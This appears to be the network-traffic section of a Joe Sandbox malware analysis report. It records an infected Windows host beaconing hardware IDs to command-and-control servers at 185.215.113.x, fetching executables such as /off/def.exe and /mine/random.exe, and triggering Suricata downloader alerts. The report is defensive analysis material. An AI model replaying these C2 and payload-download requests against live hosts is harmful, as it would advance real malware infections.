Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHJJEHIEBKKFIDHDGHJHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 44 32 42 43 38 44 36 42 42 45 32 30 39 39 39 32 35 32 38 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 2d 2d 0d 0a Data Ascii: ------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="hwid"D5D2BC8D6BBE2099925286------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="build"tale------AFHJJEHIEBKKFIDHDGHJ--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 37 31 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002711001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 35 32 43 37 36 42 38 35 39 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B52C76B85982D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 35 32 43 37 36 42 38 35 39 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B52C76B85982D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGIEGCFHCFHIDHIJECHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 44 32 42 43 38 44 36 42 42 45 32 30 39 39 39 32 35 32 38 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 2d 2d 0d 0a Data Ascii: ------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="hwid"D5D2BC8D6BBE2099925286------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="build"tale------AEBGIEGCFHCFHIDHIJEC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 35 32 43 37 36 42 38 35 39 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B52C76B85982D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 35 32 43 37 36 42 38 35 39 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B52C76B85982D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBAFIIJKJEGIDGDGIIDHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 44 32 42 43 38 44 36 42 42 45 32 30 39 39 39 32 35 32 38 36 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 2d 2d 0d 0a Data Ascii: ------FBAFIIJKJEGIDGDGIIDHContent-Disposition: form-data; name="hwid"D5D2BC8D6BBE2099925286------FBAFIIJKJEGIDGDGIIDHContent-Disposition: form-data; name="build"tale------FBAFIIJKJEGIDGDGIIDH--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 35 32 43 37 36 42 38 35 39 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B52C76B85982D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBGIDHCAAKEBAKFIIIEBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 49 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 44 32 42 43 38 44 36 42 42 45 32 30 39 39 39 32 35 32 38 36 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 49 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 49 49 45 42 2d 2d 0d 0a Data Ascii: ------FBGIDHCAAKEBAKFIIIEBContent-Disposition: form-data; name="hwid"D5D2BC8D6BBE2099925286------FBGIDHCAAKEBAKFIIIEBContent-Disposition: form-data; name="build"tale------FBGIDHCAAKEBAKFIIIEB--
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 34.149.100.209 34.149.100.209
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49712 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50196 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50233 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50241 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50247 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50250 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50250 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50278 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50306 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://static.criteo.net/js/ld/publishertag.js*://web-assets.toggl.com/app/assets/scripts/*.jspictureinpicture%40mozilla.org:1.0.0*://www.google-analytics.com/analytics.js**://pub.doubleverify.com/signals/pub.js**://www.google-analytics.com/gtm/js*FileUtils_closeAtomicFileOutputStreamresource://gre/modules/addons/XPIProvider.jsmwebcompat-reporter@mozilla.org.xpiFileUtils_closeSafeFileOutputStreamhttps://smartblock.firefox.etp/facebook.svg*://www.everestjs.net/static/st.v3.js**://www.rva311.com/static/js/main.*.chunk.js*://connect.facebook.net/*/sdk.js**://www.googletagmanager.com/gtm.js**://cdn.branch.io/branch-latest.min.js**://www.google-analytics.com/plugins/ua/ec.js*://connect.facebook.net/*/all.js**://libs.coremetrics.com/eluminate.js*://ssl.google-analytics.com/ga.js*://s0.2mdn.net/instream/html5/ima3.js*://track.adform.net/serving/scripts/trackpoint/resource://gre/modules/FileUtils.sys.mjs*://*.imgur.com/js/vendor.*.bundle.js*://*.imgur.io/js/vendor.*.bundle.jswebcompat-reporter%40mozilla.org:1.5.1*://c.amazon-adsystem.com/aax2/apstag.js@mozilla.org/ad